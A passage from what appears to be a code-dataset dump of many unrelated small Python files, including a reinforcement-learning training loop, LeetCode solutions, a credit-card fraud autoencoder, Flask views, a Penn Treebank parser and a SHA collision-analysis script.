\"\\nState Prime: \\n\" + str(state_prime.reshape(num_grid_y,num_grid_x)))\n state = state_prime\n if done:\n \n done = False\n \n #check for a catch\n if reward == 1:\n reward_count += 1\n print(\"CATCH!!!\")\n\n #exit this epoch \n break\n i = i + 1\n \n if(agent.memory_length() > batch_size) and (update_model):\n #start = time.time()\n history = agent.replay(batch_size)\n print(\"epoch: \" + str(r) + \" history: \" + str(history.history['loss']) + \" reward_count: \" + str(reward_count))\n #end = time.time()\n #print(end - start)\n total_loss.append(history.history['loss'])\n \n\n if r % 10 == 0:\n total_rewards.append(total_reward)\n num_epochs.append(r)\n \n\n\nif save_model:\n agent.save(model_name)\n\n\nplt.figure(1)\nplt.plot(num_epochs,total_rewards)\nplt.title(\"Cumulative Reward in Deep Learning 2D Simulation: Vector State\")\nplt.ylabel(\"Cumulative Reward\")\nplt.xlabel(\"Number of Updates\")\nplt.show()\n\n\n","repo_name":"bryonkucharski/robot-catcher","sub_path":"python_scripts/goalie_2D/dqn/dqn_2D_simulation_1D_robot_x.py","file_name":"dqn_2D_simulation_1D_robot_x.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118676713","text":"class Solution:\n def maxProduct(self, nums):\n if not nums:\n return 0\n\n cur_max = cur_min = res = nums[0]\n\n for n in nums[1:]:\n cur_max, cur_min = max(n, cur_max * n, cur_min * n), min(n, cur_max * n, cur_min * n)\n res = max(res, cur_max)\n\n return res\n","repo_name":"cabulous/leetcode","sub_path":"python/152.py","file_name":"152.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35288922838","text":"import os\n\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\nfrom pylab import rcParams\nimport tensorflow as tf\nfrom keras.models import Model, load_model\nfrom keras.layers import Input, Dense\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom keras import regularizers\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, precision_recall_curve\nfrom sklearn.metrics import recall_score, classification_report, auc, roc_curve\nfrom sklearn.metrics import precision_recall_fscore_support, f1_score\nfrom numpy.random import seed\n \nseed(1)\nfrom tensorflow import set_random_seed\n\nset_random_seed(2)\nSEED = 123 # used to help randomly select the data points\nDATA_SPLIT_PCT = 0.2\nrcParams['figure.figsize'] = 8, 6\nLABELS = [\"Normal\", \"Fraud\"]\n\ndf = pd.read_csv(\"creditcard.csv\")\n\n# print(df.shape[0])\n\nsign = lambda x: (1, -1)[x < 0]\n\ndf_train, df_test = train_test_split(df, test_size=DATA_SPLIT_PCT, random_state=SEED)\ndf_train, df_valid = train_test_split(df_train, test_size=DATA_SPLIT_PCT, random_state=SEED)\n\n# print(df_train.shape[0], df_valid.shape[0], df_test.shape[0])\n\ndf_train_0 = df_train.loc[df['Class'] == 0]\ndf_train_1 = df_train.loc[df['Class'] == 1]\ndf_train_0_x = df_train_0.drop(['Class'], axis=1)\ndf_train_1_x = df_train_1.drop(['Class'], axis=1)\n# print(df_train_0_x.shape[0], df_train_0_x.shape[0])\n\ndf_valid_0 = df_valid.loc[df['Class'] == 0]\ndf_valid_1 = df_valid.loc[df['Class'] == 1]\ndf_valid_0_x = df_valid_0.drop(['Class'], axis=1)\ndf_valid_1_x = df_valid_1.drop(['Class'], axis=1)\n# print(df_valid_0_x.shape[0], df_valid_0_x.shape[0])\n\ndf_test_0 = df_test.loc[df['Class'] == 0]\ndf_test_1 = df_test.loc[df['Class'] == 1]\ndf_test_0_x = df_test_0.drop(['Class'], axis=1)\ndf_test_1_x = df_test_1.drop(['Class'], axis=1)\n# print(df_test_0_x.shape[0], df_test_0_x.shape[0])\n\nscaler = StandardScaler().fit(df_train_0_x)\ndf_train_0_x_rescaled = scaler.transform(df_train_0_x)\ndf_valid_0_x_rescaled = scaler.transform(df_valid_0_x)\ndf_valid_x_rescaled = scaler.transform(df_valid.drop(['Class'], axis=1))\ndf_test_0_x_rescaled = scaler.transform(df_test_0_x)\ndf_test_x_rescaled = scaler.transform(df_test.drop(['Class'], axis=1))\n\nnb_epoch = 100\nbatch_size = 128\ninput_dim = df_train_0_x_rescaled.shape[1] # num of predictor variables,\nencoding_dim = 32\nhidden_dim = int(encoding_dim / 2)\nlearning_rate = 10e-8\ninput_layer = Input(shape=(input_dim,))\nencoder = Dense(encoding_dim, activation='relu', activity_regularizer=regularizers.l1(learning_rate))(input_layer)\nencoder = Dense(hidden_dim, activation='relu')(encoder)\ndecoder = Dense(hidden_dim, activation='relu')(encoder)\ndecoder = Dense(input_dim, activation='relu')(decoder)\n\nautoencoder = load_model('autoencoder_classifier.h5')\n\n# autoencoder = Model(inputs=input_layer, outputs=decoder)\n#\n# autoencoder.compile(metrics=['accuracy'],\n# loss='mean_squared_error',\n# optimizer='adam')\n# cp = ModelCheckpoint(filepath=\"autoencoder_classifier.h5\",\n# save_best_only=True,\n# verbose=0)\n# tb = TensorBoard(log_dir='./logs',\n# histogram_freq=0,\n# write_graph=True,\n# write_images=True)\n#\n#\n# history = autoencoder.fit(df_train_0_x_rescaled, df_train_0_x_rescaled,\n# epochs=nb_epoch,\n# batch_size=batch_size,\n# shuffle=True,\n# validation_data=(df_valid_0_x_rescaled, df_valid_0_x_rescaled),\n# verbose=1,\n# callbacks=[cp, tb]).history\n\nvalid_x_predictions = autoencoder.predict(df_valid_x_rescaled)\nmse = np.mean(np.power(df_valid_x_rescaled - valid_x_predictions, 2), axis=1)\nerror_df = pd.DataFrame({'Reconstruction_error': mse, 'True_class': df_valid['Class']})\nprecision_rt, recall_rt, threshold_rt = precision_recall_curve(error_df.True_class, error_df.Reconstruction_error)\nplt.plot(threshold_rt, precision_rt[1:], label=\"Precision\", linewidth=5)\nplt.plot(threshold_rt, recall_rt[1:], label=\"Recall\", linewidth=5)\nplt.title('Precision and recall for different threshold values')\nplt.xlabel('Threshold')\nplt.ylabel('Precision/Recall')\nplt.legend()\nplt.show()\n\nf1_array = []\nmax_f1_array = 0\nprecision_recall_pos = 0\nfor i in range(len(recall_rt)):\n num = 2 * recall_rt[i] * precision_rt[i]\n den = recall_rt[i] + precision_rt[i]\n temp_f1_array = float (num/den)\n f1_array.append(temp_f1_array)\n if temp_f1_array > max_f1_array:\n max_f1_array = temp_f1_array\n precision_recall_pos = i\nprint(max_f1_array, precision_recall_pos)\nprint(precision_rt[precision_recall_pos])\nprint(recall_rt[precision_recall_pos])\n\ntest_x_predictions = autoencoder.predict(df_test_x_rescaled)\nmse = np.mean(np.power(df_test_x_rescaled - test_x_predictions, 2), axis=1)\nprint(\"mse: \", mse)\nerror_df_test = pd.DataFrame({'Reconstruction_error': mse, 'True_class': df_test['Class']})\nerror_df_test = error_df_test.reset_index()\nthreshold_fixed = 0.22\ngroups = error_df_test.groupby('True_class')\nfig, ax = plt.subplots()\nfor name, group in groups:\n ax.plot(group.index, group.Reconstruction_error, marker='o', ms=3.5, linestyle='',\n label=\"Fraud\" if name == 1 else \"Normal\")\nax.hlines(threshold_fixed, ax.get_xlim()[0], ax.get_xlim()[1], colors=\"r\", zorder=100, label='Threshold')\nax.legend()\nplt.title(\"Reconstruction error for different classes\")\nplt.ylabel(\"Reconstruction error\")\nplt.xlabel(\"Data point index\")\nplt.show()\n\npred_y = [1 if e > threshold_fixed else 0 for e in error_df_test.Reconstruction_error.values]\nconf_matrix = confusion_matrix(error_df_test.True_class, pred_y)\nplt.figure(figsize=(12, 12))\nsns.heatmap(conf_matrix, xticklabels=LABELS, yticklabels=LABELS, annot=True, fmt=\"d\")\nplt.title(\"Confusion matrix\")\nplt.ylabel('True class')\nplt.xlabel('Predicted class')\nplt.show()\n\n# opt_th=0\n# max_f1=0\n# conf_matrix=np.zeros((2, 2))\n# temp_conf_matrix=np.zeros((2, 2))\n# j = np.arange(0, 5, 0.1)\n# for i in j:\n# pred_y = [1 if e > i else 0 for e in error_df_test.Reconstruction_error.values]\n# conf_matrix = confusion_matrix(error_df_test.True_class, pred_y)\n# temp_recall = conf_matrix[1][1] / (conf_matrix[1][1] + conf_matrix[0][1])\n# temp_precision = conf_matrix[1][1] / (conf_matrix[1][1] + conf_matrix[1][0])\n# temp_f1 = 2*temp_recall*temp_precision/(temp_precision + temp_recall)\n# if temp_f1 > max_f1:\n# opt_th = i\n# max_f1 = temp_f1\n# temp_conf_matrix = conf_matrix\n#\n# conf_matrix = temp_conf_matrix\n# threshold_fixed = opt_th\n# print(threshold_fixed)\n# plt.figure(figsize=(12, 12))\n# sns.heatmap(conf_matrix, xticklabels=LABELS, yticklabels=LABELS, annot=True, fmt=\"d\")\n# plt.title(\"Confusion matrix\")\n# plt.ylabel('True class')\n# plt.xlabel('Predicted class')\n# plt.show()\n\nfalse_pos_rate, true_pos_rate, thresholds = roc_curve(error_df.True_class, error_df.Reconstruction_error)\nroc_auc = auc(false_pos_rate, true_pos_rate,)\nplt.plot(false_pos_rate, true_pos_rate, linewidth=5, label='AUC = %0.3f'% roc_auc)\nplt.plot([0, 1], [0, 1], linewidth=5)\nplt.xlim([-0.01, 1])\nplt.ylim([0, 1.01])\nplt.legend(loc='lower right')\nplt.title('Receiver operating characteristic curve (ROC)')\nplt.ylabel('True Positive Rate')\nplt.xlabel('False Positive Rate')\nplt.show()\n","repo_name":"jashrathod/Credit-Card-Fraud-Detection","sub_path":"credit_card_keras.py","file_name":"credit_card_keras.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36905672104","text":"\"\"\"\nviews.py\n\nURL route handlers\n\nNote that any handler params must match the URL route params.\nFor example the *say_hello* handler, handling the URL route '/hello/',\n must be passed *username* as the argument.\n\n\"\"\"\nfrom google.appengine.api import users\nfrom google.appengine.runtime.apiproxy_errors import CapabilityDisabledError\n\nfrom flask import request, render_template, flash, url_for, redirect\n\nfrom flask_cache import Cache\n\nfrom application import app\nfrom decorators import login_required, admin_required\nfrom forms import ExampleForm\nfrom models import ExampleModel\n\n\n# Flask-Cache (configured to use App Engine Memcache API)\ncache = Cache(app)\n\n\ndef home():\n return redirect(url_for('list_examples'))\n\n\ndef say_hello(username):\n \"\"\"Contrived example to demonstrate Flask's url routing capabilities\"\"\"\n return 'Hello %s' % username\n\n\n@login_required\ndef list_examples():\n \"\"\"List all examples\"\"\"\n examples = ExampleModel.query()\n form = ExampleForm()\n if form.validate_on_submit():\n example = ExampleModel(\n example_name=form.example_name.data,\n example_description=form.example_description.data,\n added_by=users.get_current_user()\n )\n try:\n example.put()\n example_id = example.key.id()\n flash(u'Example %s successfully saved.' % example_id, 'success')\n return redirect(url_for('list_examples'))\n except CapabilityDisabledError:\n flash(u'App Engine Datastore is currently in read-only mode.', 'info')\n return redirect(url_for('list_examples'))\n return render_template('list_examples.html', examples=examples, form=form)\n\n\n@login_required\ndef edit_example(example_id):\n example = ExampleModel.get_by_id(example_id)\n form = ExampleForm(obj=example)\n if request.method == \"POST\":\n if form.validate_on_submit():\n example.example_name = form.data.get('example_name')\n example.example_description = form.data.get('example_description')\n example.put()\n flash(u'Example %s successfully saved.' % example_id, 'success')\n return redirect(url_for('list_examples'))\n return render_template('edit_example.html', example=example, form=form)\n\n\n@login_required\ndef delete_example(example_id):\n \"\"\"Delete an example object\"\"\"\n example = ExampleModel.get_by_id(example_id)\n try:\n example.key.delete()\n flash(u'Example %s successfully deleted.' % example_id, 'success')\n return redirect(url_for('list_examples'))\n except CapabilityDisabledError:\n flash(u'App Engine Datastore is currently in read-only mode.', 'info')\n return redirect(url_for('list_examples'))\n\n\n@admin_required\ndef admin_only():\n \"\"\"This view requires an admin account\"\"\"\n return 'Super-seekrit admin page.'\n\n\n@cache.cached(timeout=60)\ndef cached_examples():\n \"\"\"This view should be cached for 60 sec\"\"\"\n examples = ExampleModel.query()\n return render_template('list_examples_cached.html', examples=examples)\n\n\ndef warmup():\n \"\"\"App Engine warmup handler\n See http://code.google.com/appengine/docs/python/config/appconfig.html#Warming_Requests\n\n \"\"\"\n return ''\n\n","repo_name":"RobWC/dfcloud","sub_path":"oldstuff/old/application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"818275699","text":"class Solution:\n def uniqueMorseRepresentations(self, words: List[str]) -> int:\n morse = [\".-\",\"-...\",\"-.-.\",\"-..\",\".\",\"..-.\",\"--.\",\"....\",\"..\",\".---\",\"-.-\",\".-..\",\"--\",\"-.\",\"---\",\".--.\",\"--.-\",\".-.\",\"...\",\"-\",\"..-\",\"...-\",\".--\",\"-..-\",\"-.--\",\"--..\"]\n alpha = 'abcdefghijklmnopqrstuvwxyz'\n p = []\n for word in words:\n k = ''\n for char in word:\n\t\t\t\t# This below line is for finding the index of each character in the morse list\n\t\t\t\t# we know that ASCII value of a is 97 so -97 will give us the perfect index\n k += morse[ord(char)-97]\n p.append(k)\n return len(list(set(p)))","repo_name":"ahmaddroobi99/ProblemSolving","sub_path":"unique-morse-code-words.py","file_name":"unique-morse-code-words.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22787718207","text":"class Solution:\r\n def removeDuplicateLetters(self, s: str) -> str:\r\n #Time: O(n)\r\n #Space: O(n)\r\n #Using an array of size 26 to track and turn chars into a string doesn't work since the output has to be a subsequence of s\r\n #In terms of lexicography and greediness, keep smaller chars at the front while making sure every char has a place in the final output\r\n \r\n lastIdx = {char : idx for idx, char in enumerate(s)} #Prevent appending the last one any char's kind\r\n seen = set() #Prevent duplicates in the stack\r\n stack = [] #Monotonic - small chars at the bottom\r\n \r\n for idx, char in enumerate(s):\r\n if char in seen:\r\n continue\r\n \r\n while len(stack) and char < stack[-1] and idx < lastIdx[stack[-1]]:\r\n seen.remove(stack.pop())\r\n \r\n stack.append(char)\r\n seen.add(char)\r\n \r\n return ''.join(stack)","repo_name":"NaralC/Algorithms-Interview-Questions","sub_path":"Leetcode/Medium/0316-Remove-Duplicate-Letters.py","file_name":"0316-Remove-Duplicate-Letters.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14575097009","text":"from nnb.utils.ptb import PTBTreeNode\n\nclass PTBTokenizer:\n def __init__(self):\n self.index = 0\n self.line = None\n\n def set_line(self, line):\n self.line = line.strip()\n self.index = 0\n\n def next_token(self):\n if self.line == None:\n raise ValueError(\n \"Set a line first with Tokenizer.set_line(self,line)\"\n )\n\n while self.index < len(self.line):\n c = self.line[self.index]\n if c == ' ' or c == '\\n':\n self.index += 1\n continue\n if c == '(' or c == ')':\n self.index += 1\n return c\n cb = self.index\n def is_stop_char(c):\n return c == ')' or c == '(' or c == ' ' or c == '\\n'\n while self.index < len(self.line) and \\\n not is_stop_char(self.line[self.index]):\n self.index += 1\n return self.line[cb:self.index]\n\n return None\n\nclass PTBParser:\n def __init__(self, filename=None):\n self.read_file = None\n if filename is not None:\n self.read_file = open(filename,'r')\n self.t = PTBTokenizer()\n\n def __del__(self):\n if self.read_file is not None:\n self.read_file.close()\n\n def parse(self, string=None, new_tree=True):\n if new_tree and self.read_file is not None:\n line = self.read_file.readline()\n self.t.set_line(line)\n self.t.next_token()\n\n if string is not None:\n self.t.set_line(string)\n self.t.next_token()\n\n if self.read_file is None and string is None and new_tree == True:\n raise ValueError(\n 'Parser instantiated without a file name. Either specify a ' + \\\n 'string to parse with the \"string\" parameter or instantiate' + \\\n ' a Parser with the \"filename\" parameter'\n )\n\n token = self.t.next_token()\n label = None\n label_read = False\n value = None\n while token is not None:\n if token == '(':\n if value is None:\n value = [self.parse(new_tree=False)]\n else:\n value += [self.parse(new_tree=False)]\n elif token != ')':\n if not label_read:\n label = token\n label_read = True\n else:\n value = token\n else:\n return PTBTreeNode(label,value)\n token = self.t.next_token()\n\n","repo_name":"NNBlocks/NNBlocks","sub_path":"nnb/utils/ptb/ptb_parser.py","file_name":"ptb_parser.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"25396870170","text":"# Дан список чисел. Определите, сколько в этом списке элементов,\n# которые больше двух своих соседей и выведите количество таких элементов.\n\n\ninputs = list(map(int, input().split()))\n\nlen_inputs = len(inputs)\nif len_inputs < 3:\n raise ValueError(\"incorrect inputs\")\n\nleft_val = inputs[0]\nanswer = 0\nfor i in range(1, len_inputs - 1):\n current_val = inputs[i]\n if (current_val > left_val) and (current_val > inputs[i + 1]):\n answer += 1\n left_val = inputs[i]\n\nprint(answer)\n","repo_name":"Kristobal-Khunta/Algorithms","sub_path":"yandex_algo_course/week2/taskD.py","file_name":"taskD.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74860106791","text":"\"\"\"Base parser class.\"\"\"\n\n\nclass BlockParser(object):\n \"\"\"Parser built on rules that parse blocks of input.\"\"\"\n\n def __init__(self, rules=[]):\n \"\"\"Create a BlockParser, pre-loading a set of rules.\"\"\"\n self.rules = []\n for rule in rules:\n self.add_rule(rule)\n\n def add_rule(self, rule):\n \"\"\"Add a rule to this parser\"\"\"\n self.rules.append(rule)\n\n def parse(self, generator):\n \"\"\"Parse an iterable source of strings into a generator.\"\"\"\n gen = iter(generator)\n for line in gen:\n block = {}\n for rule in self.rules:\n if rule[0](line):\n block = rule[1](line, gen)\n break\n yield block\n","repo_name":"CitrineInformatics/dftparse","sub_path":"dftparse/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"44686031645","text":"# import Asset\nimport json\n\n# This object has to match the API being used in order to make json.dumps()\n# work\nclass Stock():\n def __init__(self, open: float, close: float, high: float, low: float, average_volume: float, market_cap: float, peratio: float, dividend_yield: float, asset_type: str, last: float, symbol: str, prev_close: float):\n self.open = open\n self.close = close\n self.high = high\n self.low = low\n self.average_volume = average_volume\n self.market_cap = market_cap\n self.peratio = peratio\n self.dividend_yield = dividend_yield\n self.asset_type = asset_type\n self.last = last\n self.symbol = symbol\n self.prevclose = prev_close\n\n\n def to_json(self):\n return json.dumps(self.__dict__)\n\n @classmethod\n def from_json(cls, json_str):\n stockJson = json_str.get(\"quotes\").get(\"quote\")\n print(stockJson)\n return Stock(stockJson[\"open\"], stockJson[\"close\"], stockJson[\"high\"], stockJson[\"low\"], stockJson[\"average_volume\"], 0.0, 0.0, 0.0, stockJson[\"type\"], stockJson[\"last\"], stockJson[\"symbol\"], stockJson[\"prevclose\"])\n","repo_name":"jrgabler/stock-simulator","sub_path":"src/models/assets/Stock.py","file_name":"Stock.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"10547217440","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Integer, String, Float, Boolean,Text\n\nBase = declarative_base()\n\nfrom DBHelper.session import session\nfrom DBHelper.tables.base_table import Entity\nfrom DBHelper.tables.base_table import CustomColumn\n\n\n# 怪物\nclass Monster(Entity, Base):\n \"\"\"\n 怪物\n \"\"\"\n __cn__ = \"怪物\"\n\n __tablename__ = 'monster'\n id = CustomColumn(Integer, cn=\"ID\", primary_key=True, editable=False,autoincrement=True)\n\n name = CustomColumn(Text,cn=\"名称\",comment='')\n\n exp_value = CustomColumn(Integer, cn='经验值', comment='被击败后掉落的经验值')\n introduce = CustomColumn(Text, cn=\"介绍\")\n deposit = CustomColumn(Integer, cn=\"押金\", default=0, comment='押金')\n\n @classmethod\n def add_or_update_by_name(cls,\n *,\n name: str,\n exp_value: int = None,\n introduction: str = None,\n deposit: int = None\n ) -> \"Monster\":\n record = cls._add_or_update_by_name(kwargs=locals())\n return record\n\n @classmethod\n def add_or_update_by_id(\n cls,\n *,\n _id: int,\n\n name: str = None,\n exp_value: int = None,\n introduction: str = None,\n deposit: int = None\n ) -> \"Monster\":\n record = cls._add_or_update_by_id(kwargs=locals())\n return record\n\n# 增\n","repo_name":"York1996OutLook/WorldSimplifiedTextVersion","sub_path":"DBHelper/tables/monster.py","file_name":"monster.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31538783259","text":"def resolve():\n N = int(input())\n P = [int(e) for e in input().split()]\n\n i, ops = 0, 0\n while i < N - 1:\n if P[i] == i + 1:\n P[i], P[i + 1] = P[i + 1], P[i]\n ops += 1\n i += 1\n if P[i] == i + 1:\n ops += 1\n \n print(ops)\n\n# resolve()\n# exit()\n\nimport sys\nfrom io import StringIO\nimport unittest\n\n\nclass TestClass(unittest.TestCase):\n def assertIO(self, input, output):\n stdout, stdin = sys.stdout, sys.stdin\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\n resolve()\n sys.stdout.seek(0)\n out = sys.stdout.read()[:-1]\n sys.stdout, sys.stdin = stdout, stdin\n self.assertEqual(out, output)\n\n def test_入力例_1(self):\n input = \"\"\"5\n1 4 3 5 2\"\"\"\n output = \"\"\"2\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_2(self):\n input = \"\"\"2\n1 2\"\"\"\n output = \"\"\"1\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_3(self):\n input = \"\"\"2\n2 1\"\"\"\n output = \"\"\"0\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_4(self):\n input = \"\"\"9\n1 2 4 9 5 8 7 3 6\"\"\"\n output = \"\"\"3\"\"\"\n self.assertIO(input, output)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"koba925/alds","sub_path":"atcoder/ABC072/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37123400704","text":"#**********************************************************************\r\n# *\r\n# University Of North Carolina Charlotte *\r\n# *\r\n#Program: collision analysis *\r\n#Description: This program is to analyze the collision situation with *\r\n# various bit width sha codes *\r\n#\t\t\t *\r\n#File Name: collision.py *\r\n#File Version: 1.0 *\r\n# *\r\n#Programmed by: Yu Liu *\r\n# *\r\n#Input file: input.h\t\t\t\t\t\t\t\t\t\t *\r\n#Output file:collision_shake.txt\" *\r\n#**********************************************************************\r\nimport numpy as np\r\nimport matplotlib as plt\r\nimport matplotlib.pyplot as plt\r\nimport re\r\n\r\n\r\nif __name__ == '__main__':\r\n path=\"new_data/\"\r\n #inputfiles=[\"output_shake_40.dat\"]\r\n # If select to run below file together,it will take around than 2-3 hours\r\n inputfiles=[\"output_shake_12.dat\",\"output_shake_16.dat\",\"output_shake_20.dat\",\"output_shake_24.dat\",\"output_shake_28.dat\",\"output_shake_32.dat\",\"output_shake_36.dat\",\"output_shake_40.dat\",\"output_shake_48.dat\",\"output_shake_56.dat\",\"output_shake_64.dat\"]\r\n #inputfiles=[\"output_shake_32.dat\"]\r\n\r\n\r\n outputfile=\"collision_shake.txt\"\r\n\r\n k=0\r\n filename=[]\r\n findCollision=[]\r\n firstCollisionPosition=[]\r\n firstCollisionData=[]\r\n collisionList = {}\r\n collisions = []\r\n collidedDataNum = []\r\n temp = []\r\n\r\n for file in (inputfiles):\r\n filename.append(file)\r\n f = open(path+file, mode='r')\r\n content = f.readlines()\r\n f.close()\r\n\r\n # find the first lollision\r\n j=0\r\n temp.append(0)\r\n firstCollisionPosition.append(0)\r\n firstCollisionData.append('')\r\n findCollision.append(0) # a flag of collision\r\n for data in content:\r\n for pt in range(j+1,len(content)):\r\n if content[pt]==content[j]:\r\n #print(\"j-%d: %s VS pt-%d: %s \"%(j,content[j],pt,content[pt])) # for debugging\r\n firstCollisionPosition[k]=pt # record the position of first collision\r\n temp[k] = j\r\n firstCollisionData[k]=content[pt].strip('\\n') # record the the data of first collision without '\\n'\r\n findCollision[k]=1\r\n break\r\n if findCollision[k] == 1: # if find a collision\r\n break\r\n else:\r\n j+=1\r\n\r\n # count the collision amount\r\n dataWithCount= dict(zip(*np.unique(content, return_counts=True))) # count each recoard's duplicate #\r\n # print(dataWithCount)\r\n # print(\"Collision list:\", collisionList)\r\n collidedDataNum.append(0)\r\n collisions.append(0) #amount of collision\r\n for key,value in dataWithCount.items():\r\n if value >=2:\r\n collisionList.update({key:value-1}) #collision data\r\n collisions[k]= collisions[k] + value - 1 #total collision in this file\r\n collidedDataNum[k] +=1 # number of collision data in this file\r\n k+=1\r\n dataWithCount.clear()\r\n print(\"%s: \" % (inputfiles[k-1]),end=\"\")\r\n print(collisionList) # for debugging\r\n collisionList.clear()\r\n print(\"\\n\")\r\n #print(count) # for debugging\r\n\r\n # output the result\r\n f = open(outputfile, 'w')\r\n print(\"Data source First colission position Number of collided data Total collissions First collided data\")\r\n f.write(\"Data source First colission position Number of collided data Total collissions First collided data\\n\")\r\n for i in range(len(inputfiles)):\r\n print(\"%-20s %-4d -> %-5d %-6d %-6d %-64s\" %(inputfiles[i], temp[i],firstCollisionPosition[i],collidedDataNum[i],collisions[i], firstCollisionData[i]))\r\n f.write(\"%-20s %-4d -> %-5d %-6d %-6d %-64s\\n\" %(inputfiles[i], temp[i],firstCollisionPosition[i],collidedDataNum[i],collisions[i], firstCollisionData[i]))\r\n f.close()\r\n\r\n # plot the result\r\n plt.rcParams['font.sans-serif']=['Comic Sans MS']\r\n\r\n a=collisions\r\n b=firstCollisionPosition\r\n lx=[]\r\n l=[i for i in range(len(inputfiles))]\r\n for string in inputfiles:\r\n num=number = re.sub(\"\\D\",\"\",string)\r\n lx.append(num)\r\n\r\n #print(firstCollisionPosition)\r\n #print(collisions)\r\n\r\n fmt='%d%%'\r\n fig = plt.figure()\r\n plt.title('COLLISION (with original data)') # warning\r\n plt.xlabel(u\"SHA3 bits\", fontproperties='Comic Sans MS') # warning\r\n\r\n ax1 = fig.add_subplot(111)\r\n ax1.plot(l, b,'or-',label=u'First collision position')\r\n for i,(_x,_y) in enumerate(zip(l,b)):\r\n plt.text(_x,_y,b[i],color='black',fontsize=10,)\r\n ax1.legend(loc=1)\r\n ax1.set_ylim([0, 100000])\r\n ax1.set_ylabel('First collision position')\r\n\r\n #fisrt collision position\r\n ax2 = ax1.twinx() # second axel\r\n plt.bar(l,a,alpha=0.3,color='blue',label=u'Total collisions')\r\n ax2.legend(loc=2)\r\n ax2.set_ylim([0, 100000]) #y axel range\r\n ax2.set_ylabel('Total collisions')\r\n plt.legend(prop={'family':'Comic Sans MS','size':8},loc=\"upper left\")\r\n #ax.set_xlabel('First collision position');\r\n plt.xticks(l,lx)\r\n plt.show()","repo_name":"royliuyu/Mem-Simulation","sub_path":"simulation/hashfunction_x86_64/version1_collisionTotalAmountAnalysis/collision.py","file_name":"collision.py","file_ext":"py","file_size_in_byte":5982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6590203316","text":"import pickle\nimport numpy as np\n\ntest_dict_1 = {'message_length': 2345,\n 'additional_info': 'none'}\n\ndata_1 = pickle.dumps(test_dict_1)\nprint(data_1)\nloaded_data = pickle.loads(data_1)\nprint(loaded_data)\n\ntest_array = np.random.randn(2, 3)\nprint(\"test array:\", test_array)\ntest_dict_2 = {'data': test_array.tobytes(),\n 'data shape': [2, 3]}\nprint(test_dict_2)\ndata_2 = pickle.dumps(test_dict_2)\nloaded_data_2 = pickle.loads(data_2)\nprint(loaded_data_2)\nprint(np.frombuffer(loaded_data_2['data']))\n\ntest_array = np.random.randn(2, 3)\ntest_dict_3 = {'data': test_array,\n 'data shape': [2, 3]}\nprint(test_dict_3)\ndata_3 = pickle.dumps(test_dict_3)\nprint(\"data 3 length:\", len(data_3))\nloaded_data_3 = pickle.loads(data_3)\nprint(loaded_data_3)\n\n","repo_name":"vincentherrmann/constrastive-predictive-coding-audio","sub_path":"dreaming/data_transfer_tests.py","file_name":"data_transfer_tests.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10151389498","text":"\"\"\"\nPowerful Digit Sum\nProject Euler Problem #56\nby Muaz Siddiqui\n\nA googol (10^100) is a massive number: one followed by one-hundred zeros; 100^100 \nis almost unimaginably large: one followed by two-hundred zeros. Despite their size,\n the sum of the digits in each number is only 1.\n\nConsidering natural numbers of the form, ab, where a, b < 100, what is the maximum \ndigital sum?\n\"\"\"\nfrom euler_helpers import timeit, digital_sum\n\n#brute force\n@timeit\ndef answer():\n max_ = 0\n for a in range(2, 101):\n for b in range(2, 101):\n next = digital_sum(pow(a, b))\n if next > max_:\n max_ = next\n return max_","repo_name":"respectus/Euler-Problems","sub_path":"problem56.py","file_name":"problem56.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"37010544447","text":"from rest_framework import generics, status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n# from rest_framework.permissions import IsAuthenticated\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Q, Sum, Case, IntegerField, When\nfrom django.http import Http404\nfrom main_app.permissions import IsSetupOwner\nfrom main_app.models import BossSetup, PlayerSetup, UlalaBoss\nfrom 